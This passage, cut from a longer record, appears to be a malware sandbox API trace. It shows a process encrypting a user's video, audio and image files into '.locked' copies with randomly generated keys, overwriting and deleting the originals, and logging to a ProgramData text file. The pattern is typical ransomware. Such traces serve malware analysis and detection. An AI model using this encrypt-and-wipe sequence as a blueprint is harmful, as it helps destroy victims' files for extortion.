dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0320.645] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0320.646] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\l1TF3hoXns.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\l1tf3hoxns.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0320.646] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0320.646] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0320.646] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8060 | out: pbBuffer=0x124a8060) returned 1 [0320.647] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0320.647] WriteFile (in: hFile=0x1f4, lpBuffer=0x126c7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e5d78, lpOverlapped=0x0 | out: lpBuffer=0x126c7000*, lpNumberOfBytesWritten=0x125e5d78*=0x80, lpOverlapped=0x0) returned 1 [0320.650] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x0 [0320.651] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0320.651] SetEvent (hEvent=0x22c) returned 1 [0320.651] SetEvent (hEvent=0x12c) returned 1 [0320.651] SetEvent (hEvent=0x220) returned 1 [0320.651] ReadFile (in: hFile=0x23c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e5d68*=0xe0db, lpOverlapped=0x0) returned 1 [0320.655] WriteFile (in: hFile=0x1f4, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xe0db, lpNumberOfBytesWritten=0x125e5d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125e5d74*=0xe0db, lpOverlapped=0x0) returned 1 [0320.704] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.839] SetEvent (hEvent=0x150) returned 1 [0320.839] SetEvent (hEvent=0x134) returned 1 [0320.839] ReadFile (in: hFile=0x23c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e5d68*=0x0, lpOverlapped=0x0) returned 1 [0320.839] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.943] CloseHandle (hObject=0x1f4) returned 1 [0320.943] CloseHandle (hObject=0x23c) returned 1 [0320.943] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0320.943] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x125e5e94 | out: lpMode=0x125e5e94) returned 0 [0320.943] WriteFile (in: hFile=0x23c, lpBuffer=0x1264a100*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x125e5e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a100*, lpNumberOfBytesWritten=0x125e5e64*=0x31, lpOverlapped=0x0) returned 1 [0320.944] CloseHandle (hObject=0x23c) returned 1 [0320.944] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\l1TF3hoXns.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\l1tf3hoxns.avi")) returned 1 [0320.947] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.005] SetEvent (hEvent=0x22c) returned 1 [0321.005] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.005] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.205] SetEvent (hEvent=0x104) returned 1 [0321.205] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.209] SetEvent (hEvent=0x14c) returned 1 [0321.209] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.210] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1a20ba24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1a20ba24*=0xc) returned 1 [0321.225] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.245] SetEvent (hEvent=0x1ac) returned 1 [0321.245] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.246] SetEvent (hEvent=0x214) returned 1 [0321.246] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.249] SetEvent (hEvent=0x214) returned 1 [0321.249] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.251] SetEvent (hEvent=0x184) returned 1 [0321.251] SetEvent (hEvent=0x12c) returned 1 [0321.251] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0321.319] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.319] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0321.324] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.325] SetEvent (hEvent=0x1ac) returned 1 [0321.325] SetEvent (hEvent=0x12c) returned 1 [0321.325] SetEvent (hEvent=0x184) returned 1 [0321.325] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.325] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0321.325] SetEvent (hEvent=0x150) returned 1 [0321.326] SetEvent (hEvent=0x184) returned 1 [0321.326] WriteFile (in: hFile=0x1f4, lpBuffer=0x17a14000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12657e78, lpOverlapped=0x0 | out: lpBuffer=0x17a14000*, lpNumberOfBytesWritten=0x12657e78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.344] CloseHandle (hObject=0x1f4) returned 1 [0321.344] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\geY--KBb2-E.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\gey--kbb2-e.flv")) returned 1 [0321.349] WriteFile (in: hFile=0x240, lpBuffer=0x12992000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dde78, lpOverlapped=0x0 | out: lpBuffer=0x12992000*, lpNumberOfBytesWritten=0x125dde78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.367] CloseHandle (hObject=0x240) returned 1 [0321.368] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\l1TF3hoXns.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\l1tf3hoxns.avi")) returned 1 [0321.375] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.393] SetEvent (hEvent=0x214) returned 1 [0321.393] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.393] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.453] SetEvent (hEvent=0x184) returned 1 [0321.453] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0321.454] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) Thread: id = 436 os_tid = 0xe78 [0259.428] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3342ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3342ff58*=0x17c) returned 1 [0259.429] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x184 [0259.429] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0259.571] SetEvent (hEvent=0x14c) returned 1 [0259.571] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0259.651] SetEvent (hEvent=0x190) returned 1 [0259.651] WriteFile (in: hFile=0x180, lpBuffer=0x1234a180*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12631e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a180*, lpNumberOfBytesWritten=0x12631e64*=0x32, lpOverlapped=0x0) returned 1 [0259.651] CloseHandle (hObject=0x180) returned 1 [0259.653] DeleteFileW (lpFileName="C:\\\\Users\\Default\\Documents\\My Music.locked" (normalized: "c:\\users\\default\\documents\\my music.locked")) returned 0 [0259.653] GetProcAddress (hModule=0x75600000, lpProcName="RemoveDirectoryW") returned 0x75626bf0 [0259.653] RemoveDirectoryW (lpPathName="C:\\\\Users\\Default\\Documents\\My Music.locked" (normalized: "c:\\users\\default\\documents\\my music.locked")) returned 0 [0259.654] SetEvent (hEvent=0x134) returned 1 [0259.654] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0259.773] SetEvent (hEvent=0x190) returned 1 [0259.773] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0259.832] SwitchToThread () returned 1 [0259.839] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0259.889] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0260.055] SetEvent (hEvent=0x190) returned 1 [0260.055] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0260.065] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0260.381] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\7qqVU2GatTMCj 1dpl.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7qqvu2gattmcj 1dpl.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0260.382] GetConsoleMode (in: hConsoleHandle=0x198, lpMode=0x12635d9c | out: lpMode=0x12635d9c) returned 0 [0260.382] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\7qqVU2GatTMCj 1dpl.mkv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7qqvu2gattmcj 1dpl.mkv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0260.720] GetConsoleMode (in: hConsoleHandle=0x1fc, lpMode=0x12635d9c | out: lpMode=0x12635d9c) returned 0 [0260.720] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0260.720] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0260.720] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714101 | out: pbBuffer=0x12714101) returned 1 [0260.720] WriteFile (in: hFile=0x1fc, lpBuffer=0x12679000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12635d78, lpOverlapped=0x0 | out: lpBuffer=0x12679000*, lpNumberOfBytesWritten=0x12635d78*=0x80, lpOverlapped=0x0) returned 1 [0260.723] VirtualAlloc (lpAddress=0x13be0000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x13be0000 [0260.761] VirtualAlloc (lpAddress=0x10ee4000, dwSize=0x9e000, flAllocationType=0x1000, flProtect=0x4) returned 0x10ee4000 [0260.764] VirtualAlloc (lpAddress=0x2168000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2168000 [0260.832] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0260.835] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0260.835] SetEvent (hEvent=0x150) returned 1 [0260.835] SetEvent (hEvent=0x1f0) returned 1 [0260.835] SetEvent (hEvent=0x134) returned 1 [0260.835] ReadFile (in: hFile=0x198, lpBuffer=0x135de000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12635d68, lpOverlapped=0x0 | out: lpBuffer=0x135de000*, lpNumberOfBytesRead=0x12635d68*=0xe3fb, lpOverlapped=0x0) returned 1 [0260.838] WriteFile (in: hFile=0x1fc, lpBuffer=0x135de000*, nNumberOfBytesToWrite=0xe3fb, lpNumberOfBytesWritten=0x12635d74, lpOverlapped=0x0 | out: lpBuffer=0x135de000*, lpNumberOfBytesWritten=0x12635d74*=0xe3fb, lpOverlapped=0x0) returned 1 [0260.976] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0261.045] SetEvent (hEvent=0x150) returned 1 [0261.045] ReadFile (in: hFile=0x198, lpBuffer=0x135de000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12635d68, lpOverlapped=0x0 | out: lpBuffer=0x135de000*, lpNumberOfBytesRead=0x12635d68*=0x0, lpOverlapped=0x0) returned 1 [0261.045] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0261.066] CloseHandle (hObject=0x1fc) returned 1 [0261.306] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0261.835] CloseHandle (hObject=0x198) returned 1 [0261.835] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0261.840] GetConsoleMode (in: hConsoleHandle=0x198, lpMode=0x12635e94 | out: lpMode=0x12635e94) returned 0 [0261.840] WriteFile (in: hFile=0x198, lpBuffer=0x1234a240*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x12635e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a240*, lpNumberOfBytesWritten=0x12635e64*=0x3a, lpOverlapped=0x0) returned 1 [0261.840] CloseHandle (hObject=0x198) returned 1 [0261.842] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\7qqVU2GatTMCj 1dpl.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7qqvu2gattmcj 1dpl.mkv")) returned 1 [0261.880] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0262.408] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\7qqVU2GatTMCj 1dpl.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7qqvu2gattmcj 1dpl.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0262.421] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0263.019] SetEvent (hEvent=0x12c) returned 1 [0263.019] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12635e88 | out: lpMode=0x12635e88) returned 0 [0263.019] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0263.158] WriteFile (in: hFile=0x188, lpBuffer=0x15adc000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12635e78, lpOverlapped=0x0 | out: lpBuffer=0x15adc000*, lpNumberOfBytesWritten=0x12635e78*=0xfa000, lpOverlapped=0x0) returned 1 [0265.398] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0265.977] CloseHandle (hObject=0x188) returned 1 [0266.006] SetEvent (hEvent=0x214) returned 1 [0266.006] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0269.679] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0269.679] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1265de94 | out: lpMode=0x1265de94) returned 0 [0269.679] WriteFile (in: hFile=0x218, lpBuffer=0x12646060*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x1265de64, lpOverlapped=0x0 | out: lpBuffer=0x12646060*, lpNumberOfBytesWritten=0x1265de64*=0x2e, lpOverlapped=0x0) returned 1 [0269.679] CloseHandle (hObject=0x218) returned 1 [0269.680] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\eT_8y6.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\et_8y6.mp3")) returned 1 [0269.967] VirtualAlloc (lpAddress=0x17cf0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x17cf0000 [0269.970] VirtualAlloc (lpAddress=0x10b60000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10b60000 [0269.986] VirtualAlloc (lpAddress=0x17df0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x17df0000 [0269.989] VirtualAlloc (lpAddress=0x10b50000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10b50000 [0270.006] VirtualAlloc (lpAddress=0x17ef0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x17ef0000 [0270.009] VirtualAlloc (lpAddress=0x10b40000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10b40000 [0270.023] VirtualAlloc (lpAddress=0x17ff0000, dwSize=0x130000, flAllocationType=0x1000, flProtect=0x4) returned 0x17ff0000 [0270.026] VirtualAlloc (lpAddress=0x10b2e000, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x10b2e000 [0270.027] VirtualAlloc (lpAddress=0x2170000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2170000 [0270.047] VirtualAlloc (lpAddress=0x18120000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x18120000 [0270.051] VirtualAlloc (lpAddress=0x10b1e000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10b1e000 [0270.063] VirtualAlloc (lpAddress=0x18220000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x18220000 [0270.066] VirtualAlloc (lpAddress=0x10b0e000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10b0e000 [0270.068] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0270.072] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0270.072] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0270.072] SetEvent (hEvent=0x150) returned 1 [0270.072] SetEvent (hEvent=0x198) returned 1 [0270.082] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0270.095] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0270.095] SetEvent (hEvent=0x134) returned 1 [0270.095] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0273.573] SetEvent (hEvent=0x1b8) returned 1 [0273.573] SetEvent (hEvent=0x190) returned 1 [0273.573] SetEvent (hEvent=0x134) returned 1 [0273.574] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0276.313] SetEvent (hEvent=0x134) returned 1 [0276.316] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0276.401] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0276.401] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0276.441] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0276.441] SetEvent (hEvent=0x22c) returned 1 [0276.441] SetEvent (hEvent=0x1ac) returned 1 [0276.441] SetEvent (hEvent=0x14c) returned 1 [0276.442] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0276.452] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0276.452] SetEvent (hEvent=0x150) returned 1 [0276.452] SetEvent (hEvent=0x1ac) returned 1 [0276.452] SetEvent (hEvent=0x14c) returned 1 [0276.452] SetEvent (hEvent=0x22c) returned 1 [0276.480] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\gKB9m3gAI3.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\gkb9m3gai3.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x234 [0276.541] GetConsoleMode (in: hConsoleHandle=0x234, lpMode=0x1276be88 | out: lpMode=0x1276be88) returned 0 [0276.541] WriteFile (in: hFile=0x234, lpBuffer=0x12d42000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276be78, lpOverlapped=0x0 | out: lpBuffer=0x12d42000*, lpNumberOfBytesWritten=0x1276be78*=0xfa000, lpOverlapped=0x0) returned 1 [0276.574] CloseHandle (hObject=0x234) returned 1 [0276.657] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\gKB9m3gAI3.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\gkb9m3gai3.mp4")) returned 1 [0276.846] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0277.261] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0277.304] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0277.359] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\wpUR.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wpur.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0277.413] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1249de88 | out: lpMode=0x1249de88) returned 0 [0277.413] WriteFile (in: hFile=0x1b0, lpBuffer=0x12a26000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249de78, lpOverlapped=0x0 | out: lpBuffer=0x12a26000*, lpNumberOfBytesWritten=0x1249de78*=0xfa000, lpOverlapped=0x0) returned 1 [0277.460] CloseHandle (hObject=0x1b0) returned 1 [0277.668] SetEvent (hEvent=0x20c) returned 1 [0277.668] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0277.856] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0277.856] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\wpUR.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wpur.mp4")) returned 1 [0277.869] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0277.911] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0277.911] SetEvent (hEvent=0x190) returned 1 [0277.911] SetEvent (hEvent=0x214) returned 1 [0277.911] SetEvent (hEvent=0x20c) returned 1 [0277.911] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0277.924] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0277.924] SetEvent (hEvent=0x150) returned 1 [0277.924] SetEvent (hEvent=0x214) returned 1 [0277.924] SetEvent (hEvent=0x20c) returned 1 [0277.924] SetEvent (hEvent=0x190) returned 1 [0277.924] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0277.924] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0277.924] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0277.925] WriteFile (in: hFile=0x19c, lpBuffer=0x12633000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1263bd78, lpOverlapped=0x0 | out: lpBuffer=0x12633000*, lpNumberOfBytesWritten=0x1263bd78*=0x80, lpOverlapped=0x0) returned 1 [0277.928] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0277.942] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0277.942] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0277.942] SetEvent (hEvent=0x20c) returned 1 [0277.942] SetEvent (hEvent=0x190) returned 1 [0277.942] SetEvent (hEvent=0x214) returned 1 [0277.942] ReadFile (in: hFile=0x218, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1263bd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1263bd68*=0x16cb9, lpOverlapped=0x0) returned 1 [0277.945] WriteFile (in: hFile=0x19c, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x16cb9, lpNumberOfBytesWritten=0x1263bd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1263bd74*=0x16cb9, lpOverlapped=0x0) returned 1 [0278.024] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0278.293] ReadFile (in: hFile=0x218, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1263bd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1263bd68*=0x0, lpOverlapped=0x0) returned 1 [0278.293] CloseHandle (hObject=0x19c) returned 1 [0278.311] CloseHandle (hObject=0x218) returned 1 [0278.311] SetEvent (hEvent=0x214) returned 1 [0278.311] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0278.370] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0278.558] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ivion.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ivion.png")) returned 1 [0278.679] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0278.931] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0278.949] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0279.017] SetEvent (hEvent=0x104) returned 1 [0279.017] WaitForSingleObject (hHandle=0x184, 